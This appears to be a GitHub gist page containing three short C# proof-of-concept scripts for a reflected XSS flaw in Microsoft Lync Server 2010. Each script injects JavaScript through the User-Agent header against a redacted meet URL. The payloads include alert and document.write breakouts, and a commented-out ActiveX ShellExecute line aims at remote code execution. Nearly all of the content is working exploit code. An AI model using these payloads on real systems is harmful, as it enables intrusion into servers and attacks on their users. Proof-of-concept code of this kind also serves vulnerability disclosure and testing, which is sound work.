Created
May 30, 2014 13:16
-
-
Save DinisCruz/cc33f19a098208e1577b to your computer and use it in GitHub Desktop.
Lync 2010 XSS on UserAgent PoCs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var topPanel = panel.add_Panel(true); | |
WebClient client = new WebClient (); | |
Action<string> sendRequest = | |
(payload)=>{ | |
client.Headers.Add ("user-agent",payload); | |
var codeViewer = topPanel.add_SourceCodeViewer(); | |
var url = "https://meet.AAAAAA.co.uk"; | |
var stream = client.OpenRead(url); | |
var reader = new StreamReader(stream); | |
var html = reader.ReadToEnd(); | |
stream.Close (); | |
reader.Close (); | |
codeViewer.set_Text(html) | |
.gotoLine(28); | |
}; | |
//sendRequest("Custom-UserAgent;"); | |
sendRequest("XSS; \"; \r\n alert('xss'); // diagInfo = \""); | |
return client; | |
//using System.IO | |
//using System.Net | |
//O2Ref:System.Net.dll |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var topPanel = panel.add_Panel(true); | |
var browser = topPanel.add_WebBrowser(); | |
var payload = "Custom USER AGENT;"; | |
payload += " \"; document.write('<h1>xss</h2>'); //"; | |
browser.Navigate("https://meet.AAAAAA.co.uk", null, null, b"User-Agent: " + payload); | |
browser.waitForCompleted(); | |
return browser.get_Html(); | |
// from http://whiteoaksecurity.com/blog/2013/1/11/microsoft-lync-server-2010-remote-code-executionxss-user-agent-header | |
// in most normal IE configs, the PoC below will throw permission denied | |
//payload += "var oShell = new ActiveXObject(\"Shell.Application\");oShell.ShellExecute(\"\",\"\",\"\",\"open\",\"1\"); //"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//var ie = "ie_inMKo_".o2Cache<WatiN_IE>(()=> panel.clear().add_IE()).silent(true); // ie randon value for o2cache makes this object to unique amongst multiple instances of this control | |
var ie = panel.clear().add_IE(); | |
var payload = " \"; document.write('<h1>xss</h2>'); //"; | |
ie.WebBrowser.Navigate("https://meet.AAAAAA.co.uk", null, null, | |
"User-Agent: " + payload); | |
ie.waitForComplete(); | |
return ie.IE.Html; | |
//using FluentSharp.Watin; | |
//O2Ref:FluentSharp.Watin.dll | |
//O2Ref:WatiN.Core.dll |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment